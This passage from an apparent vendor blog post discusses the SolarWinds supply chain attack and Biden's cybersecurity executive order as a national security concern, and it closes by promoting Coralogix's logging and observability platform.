This ‘supply chain attack’ deployed trojans into SolarWinds customers’ systems through the update. The subsequent vulnerabilities opened a backdoor entrance into many highly classified government databases, including Treasury email traffic.

Why is it necessary?

While the damage of the Colonial Pipeline incident can be measured in dollars, the extent of the SolarWinds compromise has not yet been quantified. Some analysts believe the responsible groups could have been spying on classified communications for months. SolarWinds also had significant private sector customers, including Fortune 500 companies and universities, many of which could have been breached and still be unaware.

Again, these incidents are the latest in several decades marked by increasingly severe cyberattacks. Unless action is taken, instances of cybercrime that threaten national security will become not only more commonplace but more damaging.

Cybersecurity: An unprecedented national concern

Cybercrime is a unique threat. A single actor could potentially cause trillions of dollars in damages (assuming their goal is financial and not something more sinister). What’s more, the list of possible motivations for cybercriminals is far wider.

Whereas a state or non-state actor threatening US interests with a physical attack is usually politically or financially motivated (and thus easier to predict), there have been many instances of ‘troll hackers’ targeting organizations for no reason other than to cause chaos.

When you combine this with the constantly evolving global technical ecosystem, lack of regulation looks increasingly reckless. The threat of domestic terrorism is seen as real enough to warrant tight regulation of air travel (for example). Biden’s executive order is a necessary step towards cybercrime being treated as the equally valid threat it is.

Cybersecurity: A necessary investment long before Biden’s EO

Biden’s EO has shaken up how both the government and private sector are approaching cybersecurity. However, as the executive order itself and the events that preceded it prove, it’s a conversation that should have been happening much sooner.

The key takeaway for businesses from the executive order should be that none of the stipulations and requirements are new. There is no guidance in the EO which cybersecurity advocacy groups haven’t been espousing for decades.

Security, visibility, logging, and data storage/maintenance should already be core focuses for your business’s IT teams. The security of your systems and IT infrastructure should be paramount, ahead of any attempt to optimize them as a productivity and revenue boost.

Fortunately, compliance with any regulations the EO leads to doesn’t have to be a challenge. 3rd party platforms such as Coralogix offer a complete, end-to-end observability and logging solution which keeps your systems both visible and secure.

What’s more, the optimized costs and enhanced functionality over other platforms mean compliance with Biden’s EO needn’t be a return-free investment.